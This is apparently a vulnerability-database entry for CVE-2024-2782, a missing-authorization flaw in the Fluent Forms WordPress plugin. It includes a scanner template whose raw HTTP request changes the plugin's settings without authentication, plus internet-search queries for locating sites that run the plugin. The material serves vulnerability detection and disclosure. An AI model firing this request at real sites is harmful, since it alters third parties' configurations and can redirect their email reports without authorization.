| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| CVE-2024-2782 | 3 Aug 202509:00 | – | circl | |
| WordPress plugin Fluent Forms 安全漏洞 | 18 May 202400:00 | – | cnnvd | |
| CVE-2024-2782 | 18 May 202407:38 | – | cve | |
| CVE-2024-2782 Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder <= 5.1.16 - Missing Authorization to Setting Manipulation | 18 May 202407:38 | – | cvelist | |
| EUVD-2024-27726 | 3 Oct 202520:07 | – | euvd | |
| CVE-2024-2782 | 18 May 202408:15 | – | nvd | |
| CVE-2024-2782 | 18 May 202408:15 | – | osv | |
| WordPress FluentForm plugin <= 5.1.16 - Missing Authorization to Setting Manipulation vulnerability | 20 May 202401:11 | – | patchstack | |
| WordPress FluentForm Plugin <= 5.1.16 is vulnerable to Broken Access Control | 20 May 202400:00 | – | patchstack | |
| PT-2024-22058 | 18 May 202400:00 | – | ptsecurity |
id: CVE-2024-2782
info:
name: WordPress FluentForms <= 5.1.16 - Broken Access Control
author: riteshs4hu
severity: high
description: |
The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the /wp-json/fluentform/v1/global-settings REST API endpoint in all versions up to, and including, 5.1.16. This makes it possible for unauthenticated attackers to modify all of the plugin's settings.
impact: |
Unauthenticated attackers can modify all Fluent Forms plugin settings including email configurations and other sensitive parameters.
remediation: |
Update Contact Form Plugin by Fluent Forms to version 5.1.17 or later.
reference:
- https://github.com/whale93/CVE-2024-2782-PoC
- https://wpscan.com/vulnerability/075faf77-2787-4da7-bbfd-ea3c14993cc6/
- https://nvd.nist.gov/vuln/detail/CVE-2024-2782
- https://www.wordfence.com/threat-intel/vulnerabilities/id/0814e7b3-404a-4db5-b564-46c9086ec048?source=cve
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
cvss-score: 7.5
cve-id: CVE-2024-2782
cwe-id: CWE-862
epss-score: 0.0123
epss-percentile: 0.65269
cpe: cpe:2.3:a:fluentforms:contact_form:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: fluentforms
product: contact_form
framework: wordpress
shodan-query: http.html:"/wp-content/plugins/fluentform/"
fofa-query: body="/wp-content/plugins/fluentform/"
publicwww-query: "/wp-content/plugins/fluentform/"
tags: cve,cve2024,wordpress,wp-plugin,wp,fluentform,wpscan,intrusive,vkev,vuln
variables:
email: "{{randstr}}@{{rand_base(5)}}.com"
http:
- raw:
- |
POST /wp-json/fluentform/v1/global-settings HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"key": "emailSummarySettings",
"email_report": {
"status": "yes",
"send_to_type": "custom",
"custom_recipients": "{{email}}",
"sending_day": "Mon"
}
}
matchers:
- type: dsl
dsl:
- 'contains(body, "true")'
- 'len(body)==4'
- 'contains(content_type, "application/json")'
- "status_code == 200"
condition: and
# digest: 4a0a0047304502210080c2ca0093fad0f163dcb430158e7060bc473332f824d2225049865a352c5920022049b533a85f80fd1ecd29ea0cfd65d02109ec344b2eac6b6e74d8e809e0e75df8:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation